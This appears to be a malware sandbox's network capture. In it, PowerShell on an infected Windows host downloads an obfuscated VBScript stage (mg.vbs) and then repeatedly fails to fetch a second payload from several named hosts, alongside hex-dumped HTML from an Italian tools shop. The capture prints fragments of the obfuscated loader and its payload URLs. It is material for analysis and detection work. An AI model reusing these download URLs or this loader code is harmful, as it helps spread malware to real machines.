                                                                            Data Ascii: 11e58<!DOCTYPE HTML>...[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7 " lang="it"><![endif]-->...[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="it"><![endif]-->...[if IE 8]><html class="no-js lt-ie9 ie8" lang="it"><![endif]-->...[i
                                                                            2024-12-05 09:39:28 UTC140INData Raw: 65 6e 74 69 22 20 74 69 74 6c 65 3d 22 43 6f 6d 65 20 61 63 71 75 69 73 74 61 72 65 22 20 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 74 68 69 73 2e 68 72 65 66 29 3b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 43 6f 6d 65 20 61 63 71 75 69 73 74 61 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 09 09 0a 09 0a 09 3c 2f 75 6c 3e 0a 0a 3c 2f 64 69 76 3e 0a 0a 3c 21 2d 2d 20 2f 42 6c 6f 63 6b 20 6c 69 6e
                                                                            Data Ascii: enti" title="Come acquistare" onclick="window.open(this.href);return false;">Come acquistare</a></li></ul></div>... /Block lin
                                                                            2024-12-05 09:39:28 UTC8192INData Raw: 6b 73 20 6d 6f 64 75 6c 65 20 2d 2d 3e 0a 0a 09 3c 21 2d 2d 20 4d 65 6e 75 20 2d 2d 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 74 6d 5f 74 6f 70 6d 65 6e 75 22 3e 0d 0a 09 09 3c 68 34 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 5f 62 6c 6f 63 6b 22 3e 4d 65 6e 75 3c 2f 68 34 3e 0d 0a 09 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 74 72 65 65 20 64 68 74 6d 6c 22 3e 0d 0a 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 34 2d 75 74 65 6e 73 69 6c 69 2d 70 65 72 2d 6c 2d 69 6e 64 75 73 74 72 69 61 2d 65 2d 6c 2d 65 64 69 6c 69 7a 69 61 22 20 74 69 74 6c 65 3d 22 55 74 65 6e 73 69 6c 69 20 70 65 72 20 6c 27 69 6e 64 75 73 74 72 69 61 20 65 20 6c 27 65 64 69 6c 69 7a 69 61 22
                                                                            Data Ascii: ks module -->... Menu --><div id="tm_topmenu"><h4 class="title_block">Menu</h4><ul class="tree dhtml"><li class=""><a href="https://www.fornid.com/4-utensili-per-l-industria-e-l-edilizia" title="Utensili per l'industria e l'edilizia"
                                                                            2024-12-05 09:39:28 UTC8192INData Raw: 74 65 22 20 74 69 74 6c 65 3d 22 4f 6c 69 6f 20 6c 75 62 72 69 66 69 63 61 6e 74 65 22 3e 4f 6c 69 6f 20 6c 75 62 72 69 66 69 63 61 6e 74 65 3c 2f 61 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 74 6d 5f 73 75 62 55 4c 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 32 2d 6f 6c 69 6f 2d 69 64 72 61 75 6c 69 63 6f 22 20 74 69 74 6c 65 3d 22 4f 6c 69 6f 20 69 64 72 61 75 6c 69 63 6f 20 49 53 4f 20 33 32 2c 20 34 36 20 65 20 36 38 22 3e 4f 6c 69 6f 20 69 64 72 61 75 6c 69 63 6f 20 49 53 4f 20 33 32 2c 20 34 36 20 65 20 36 38 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e
                                                                            Data Ascii: te" title="Olio lubrificante">Olio lubrificante</a><ul class="tm_subUL"><li class=""><a href="https://www.fornid.com/22-olio-idraulico" title="Olio idraulico ISO 32, 46 e 68">Olio idraulico ISO 32, 46 e 68</a></li><li class=""><a href="https://www.fornid.
                                                                            2024-12-05 09:39:28 UTC8192INData Raw: 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 30 35 2d 72 61 63 63 6f 72 64 65 72 69 61 2d 69 6e 2d 6f 74 74 6f 6e 65 2d 75 73 6f 2d 63 69 76 69 6c 65 2d 69 6e 64 75 73 74 72 69 61 6c 65 2d 65 2d 70 65 72 2d 70 6f 6d 70 65 2d 69 64 72 61 75 6c 69 63 68 65 22 20 74 69 74 6c 65 3d 22 52 61 63 63 6f 72 64 65 72 69 61 20 69 6e 20 6f 74 74 6f 6e 65 20 75 73 6f 20 63 69 76 69 6c 65 2c 20 69 6e 64 75 73 74 72 69 61 6c 65 20 65 20 70 65 72 20 70 6f 6d 70 65 20 69 64 72 61 75 6c 69 63 68 65 22 3e 52 61 63 63 6f 72 64 65 72 69 61 20 69 6e 20 6f 74 74 6f 6e 65 20 75 73 6f 20 63 69 76 69 6c 65 2c 20 69 6e 64 75 73 74 72 69 61 6c 65 20 65 20 70 65 72 20 70 6f 6d 70 65 20 69 64 72 61 75 6c 69 63 68
                                                                            Data Ascii: ss=""><a href="https://www.fornid.com/305-raccorderia-in-ottone-uso-civile-industriale-e-per-pompe-idrauliche" title="Raccorderia in ottone uso civile, industriale e per pompe idrauliche">Raccorderia in ottone uso civile, industriale e per pompe idraulich
                                                                            2024-12-05 09:39:28 UTC8192INData Raw: 6d 70 65 2d 70 65 72 2d 74 72 61 74 74 6f 72 69 22 20 74 69 74 6c 65 3d 22 50 6f 6d 70 65 20 70 65 72 20 74 72 61 74 74 6f 72 69 22 3e 50 6f 6d 70 65 20 70 65 72 20 74 72 61 74 74 6f 72 69 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 35 33 2d 70 6f 6d 70 65 2d 70 65 72 2d 66 6f 67 6e 61 74 75 72 61 22 20 74 69 74 6c 65 3d 22 50 6f 6d 70 65 20 70 65 72 20 66 6f 67 6e 61 74 75 72 61 22 3e 50 6f 6d 70 65 20 70 65 72 20 66 6f 67 6e 61 74 75 72 61 3c 2f 61 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 74 6d 5f 73 75 62 55 4c 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e
                                                                            Data Ascii: mpe-per-trattori" title="Pompe per trattori">Pompe per trattori</a></li><li class=""><a href="https://www.fornid.com/253-pompe-per-fognatura" title="Pompe per fognatura">Pompe per fognatura</a><ul class="tm_subUL"><li class=""><a href="https://www.fornid.
                                                                            2024-12-05 09:39:28 UTC8192INData Raw: 70 65 72 20 69 72 72 6f 72 61 7a 69 6f 6e 65 20 63 6f 6e 20 6d 6f 74 6f 70 6f 6d 70 65 22 3e 43 61 72 72 65 6c 6c 69 20 70 65 72 20 69 72 72 6f 72 61 7a 69 6f 6e 65 20 63 6f 6e 20 6d 6f 74 6f 70 6f 6d 70 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 32 35 2d 6d 6f 74 6f 70 6f 6d 70 65 2d 69 72 72 6f 72 61 74 72 69 63 69 22 20 74 69 74 6c 65 3d 22 4d 6f 74 6f 70 6f 6d 70 65 20 69 72 72 6f 72 61 74 72 69 63 69 22 3e 4d 6f 74 6f 70 6f 6d 70 65 20 69 72 72 6f 72 61 74 72 69 63 69 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66
                                                                            Data Ascii: per irrorazione con motopompe">Carrelli per irrorazione con motopompe</a></li><li class=""><a href="https://www.fornid.com/225-motopompe-irroratrici" title="Motopompe irroratrici">Motopompe irroratrici</a></li></ul></li><li class=""><a href="https://www.f
                                                                            2024-12-05 09:39:28 UTC8192INData Raw: 3e 0a 0a 09 09 09 09 09 3c 64 69 76 3e 0a 0a 09 09 09 09 09 09 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 64 61 72 6b 22 3e 54 6f 74 61 6c 65 3c 2f 73 74 72 6f 6e 67 3e 0a 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 6c 61 79 65 72 5f 63 61 72 74 5f 70 72 6f 64 75 63 74 5f 70 72 69 63 65 22 3e 3c 2f 73 70 61 6e 3e 0a 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 79 65 72 5f 63 61 72 74 5f 63 61 72 74 20 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 6d 64 2d 36 22 3e 0a 0a 09 09 09 09 3c 70 3e 0a 0a 09 09 09 09 09 3c 21 2d 2d 20 50 6c 75 72 61 6c 20 43 61 73 65 20 5b 62 6f 74 68 20 63 61 73 65 73 20 61 72 65 20 6e 65 65 64 65 64 20 62 65
                                                                            Data Ascii: ><div><strong class="dark">Totale</strong><span id="layer_cart_product_price"></span></div></div></div><div class="layer_cart_cart col-xs-12 col-md-6"><p>... Plural Case [both cases are needed be
                                                                            2024-12-05 09:39:28 UTC8192INData Raw: 65 6c 65 74 74 72 6f 6e 69 63 69 2d 6c 69 66 74 65 72 2d 62 79 2d 70 72 61 6d 61 63 22 20 74 69 74 6c 65 3d 22 54 72 61 6e 73 70 61 6c 6c 65 74 20 65 6c 65 74 74 72 6f 6e 69 63 69 20 20 4c 49 46 54 45 52 20 42 59 20 50 52 41 4d 41 43 22 3e 54 72 61 6e 73 70 61 6c 6c 65 74 20 65 6c 65 74 74 72 6f 6e 69 63 69 20 20 4c 49 46 54 45 52 20 42 59 20 50 52 41 4d 41 43 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 33 39 2d 64 69 73 74 72 69 62 75 7a 69 6f 6e 65 2d 67 72 61 73 73 6f 2d 6d 65 63 6c 75 62 65 22 20 74 69 74 6c 65 3d 22 44 49 53 54 52 49 42 55 5a 49 4f 4e 45 20 47 52 41 53 53 4f 20 4d 45 43 4c 55 42 45 22
                                                                            Data Ascii: elettronici-lifter-by-pramac" title="Transpallet elettronici LIFTER BY PRAMAC">Transpallet elettronici LIFTER BY PRAMAC</a></li></ul></li><li class=""><a href="https://www.fornid.com/339-distribuzione-grasso-meclube" title="DISTRIBUZIONE GRASSO MECLUBE"
                                                                            2024-12-05 09:39:28 UTC408INData Raw: 46 50 32 20 2d 20 46 46 50 33 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 39 30 2d 6d 61 73 63 68 65 72 65 2d 70 65 72 2d 73 61 6c 64 61 74 75 72 61 22 20 74 69 74 6c 65 3d 22 4d 61 73 63 68 65 72 65 20 70 65 72 20 73 61 6c 64 61 74 75 72 61 22 3e 4d 61 73 63 68 65 72 65 20 70 65 72 20 73 61 6c 64 61 74 75 72 61 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 31 34 2d 73 63 61 72 70 65 2d 61 6e 74 69 6e 66 6f 72 74 75 6e 69 73 74 69 63 68 65 2d 65 2d 73 74 69 76 61 6c 65 2d 64 61 2d 6c 61 76 6f 72 6f 22 20 74 69 74 6c 65 3d
                                                                            Data Ascii: FP2 - FFP3</a></li><li class=""><a href="https://www.fornid.com/90-maschere-per-saldatura" title="Maschere per saldatura">Maschere per saldatura</a></li><li class=""><a href="https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro" title=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49734 | 91.193.42.13 | 443 | 7700 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:30 UTC | 79 | OUT | GET /na/mg.vbs HTTP/1.1
                                                                            Host: www.pineappletech.ae
                                                                            Connection: Keep-Alive
2024-12-05 09:39:30 UTC | 232 | IN | HTTP/1.1 200 OK
                                                                            Connection: close
                                                                            content-type: text/vbscript
                                                                            last-modified: Thu, 27 Jun 2024 13:15:58 GMT
                                                                            accept-ranges: bytes
                                                                            content-length: 29287
                                                                            date: Thu, 05 Dec 2024 09:39:30 GMT
                                                                            server: LiteSpeed
                                                                            vary: User-Agent
                                                                            2024-12-05 09:39:30 UTC1136INData Raw: 0d 0a 0d 0a 0d 0a 46 75 6e 63 74 69 6f 6e 20 53 65 61 73 6f 6e 69 6e 67 28 41 6d 62 72 61 69 6e 29 0d 0a 0d 0a 0d 0a 50 75 62 6c 69 6b 75 6d 6d 65 74 62 61 74 66 6f 77 6c 20 3d 20 4d 69 64 28 4d 69 64 42 28 43 6f 6d 6d 61 6e 64 2c 20 34 34 2c 20 32 31 33 29 2c 32 31 2c 32 35 29 0d 0a 0d 0a 53 65 61 73 6f 6e 69 6e 67 20 3d 20 43 68 72 57 28 41 6d 62 72 61 69 6e 29 0d 0a 0d 0a 4f 70 73 6b 72 65 6b 6e 69 76 73 70 6c 69 64 20 3d 20 43 6f 6d 6d 61 6e 64 20 0d 0a 0d 0a 0d 0a 45 6e 64 20 46 75 6e 63 74 69 6f 6e 20 0d 0a 0d 0a 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72 6e 65 20 3d 20 4c 65 6e 42 28 22 53 61 72 64 69 6e 69 65 72 65 6e 22 29 20 0d 0a 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72 6e 65 20 3d 20 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72
                                                                            Data Ascii: Function Seasoning(Ambrain)Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)Seasoning = ChrW(Ambrain)Opskreknivsplid = Command End Function elektroingenirerne = LenB("Sardinieren") elektroingenirerne = elektroingenirer
                                                                            2024-12-05 09:39:31 UTC14994INData Raw: 43 6f 6e 73 74 20 54 61 70 65 74 69 20 3d 20 22 44 65 6e 69 61 62 6c 65 20 64 61 74 61 73 74 79 72 20 75 6e 63 65 6c 69 62 61 74 65 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4e 6f 61 6f 72 64 65 74 73 20 3d 20 2d 34 35 30 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4f 73 74 65 6d 61 64 20 3d 20 26 48 37 35 30 32 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 42 6f 74 72 79 6f 6d 79 63 65 73 31 34 31 20 3d 20 26 48 46 46 46 46 45 38 38 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 55 66 6f 72 64 72 61 67 65 6c 69 67 73 74 65 20 3d 20 26 48 35 41 36 35 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 52 65 76 65 72 73 6f 20 3d 20 26 48 45 39 34 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 53 61 61 74 73 20 3d 20 22 44 65 63 69 6d
                                                                            Data Ascii: Const Tapeti = "Deniable datastyr uncelibate"Private Const Noaordets = -4508Private Const Ostemad = &H7502Private Const Botryomyces141 = &HFFFFE888Private Const Ufordrageligste = &H5A65Private Const Reverso = &HE948Private Const Saats = "Decim
                                                                            2024-12-05 09:39:31 UTC13157INData Raw: 65 64 6e 65 73 73 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 53 6b 61 6b 73 70 69 6c 6c 65 72 65 6e 73 20 3d 20 31 37 34 38 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 47 6c 69 6e 73 65 6e 64 65 20 3d 20 2d 34 32 34 35 34 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 45 76 61 73 69 76 65 6e 65 73 73 20 3d 20 26 48 34 38 43 45 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4c 65 70 74 6f 72 72 68 69 6e 69 73 6d 31 35 35 20 3d 20 2d 31 38 39 31 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 50 72 6f 67 72 61 6d 6b 6f 6d 70 6c 65 6b 73 65 74 20 3d 20 22 43 6f 6e 67 72 65 73 73 65 73 20 6d 6f 6c 69 6d 65 6e 20 6e 67 73 74 65 6c 69 67 65 72 65 73 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 43 69 67 61 72 6b 61 73 73 65 20 3d 20 35
                                                                            Data Ascii: edness"Private Const Skakspillerens = 17488Private Const Glinsende = -42454Private Const Evasiveness = &H48CEPrivate Const Leptorrhinism155 = -18918Private Const Programkomplekset = "Congresses molimen ngsteligeres"Private Const Cigarkasse = 5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 49748 | 184.171.244.231 | 443 | 832 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:34 UTC | 183 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
2024-12-05 09:39:35 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:39:35 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:39:35 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.11 | 49765 | 184.171.244.231 | 443 | 832 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:40 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
2024-12-05 09:39:41 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:39:41 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:39:41 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID: 4
Source IP: 192.168.2.11  Source Port: 49777  Destination IP: 148.251.114.233  Destination Port: 443  PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp / Bytes transferred / Direction / Data
2024-12-05 09:39:46 UTC / 98 / OUT
    GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:39:47 UTC / 238 / IN
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:39:47 GMT
    server: LiteSpeed
2024-12-05 09:39:47 UTC / 1130 / IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:39:47 UTC / 121 / IN
    Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID: 5
Source IP: 192.168.2.11  Source Port: 49792  Destination IP: 184.171.244.231  Destination Port: 443  PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp / Bytes transferred / Direction / Data
2024-12-05 09:39:52 UTC / 89 / OUT
    GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:39:53 UTC / 164 / IN
    HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:39:53 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:39:53 UTC / 315 / IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use


Session ID: 6
Source IP: 192.168.2.11  Source Port: 49806  Destination IP: 148.251.114.233  Destination Port: 443  PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp / Bytes transferred / Direction / Data
2024-12-05 09:39:58 UTC / 98 / OUT
    GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:39:59 UTC / 238 / IN
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:39:58 GMT
    server: LiteSpeed
2024-12-05 09:39:59 UTC / 1130 / IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
